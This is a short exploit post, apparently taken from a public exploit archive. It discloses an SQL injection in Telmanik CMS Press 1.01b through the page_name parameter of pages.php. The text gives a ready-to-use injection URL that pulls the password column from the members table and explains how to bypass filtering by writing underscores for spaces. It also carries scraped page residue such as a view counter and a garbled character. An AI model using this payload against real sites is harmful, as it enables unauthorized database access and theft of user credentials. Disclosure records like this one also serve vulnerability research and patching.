~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x] Type: SQL Injection [x] Vendor: www.telmanik.com [x] Script Name: Telmanik CMS Press [x] Script Version: 1.01b [x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip [x] Author: Anarchy Angel [x] Mail : anarchy[at]dc414[dot]org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: http://site.org/themes/pages.php?page_name=[SQLi] you have to formate you injection like so: union_select_row_from_table Replacing spaces with �_�. Ex: http://site.org/themes/pages.php?page_name=union_select_password_from_members This is a special DefCon 21 kick off from me! See ya there [image: ;)] Special Tnx : dc414, lun0s, proge, sToRm, progenic, gnyБрой прочитания на тази страница: 1049
Telmanik CMS Press 1.01b (pages.php, page_name param) – SQL Injection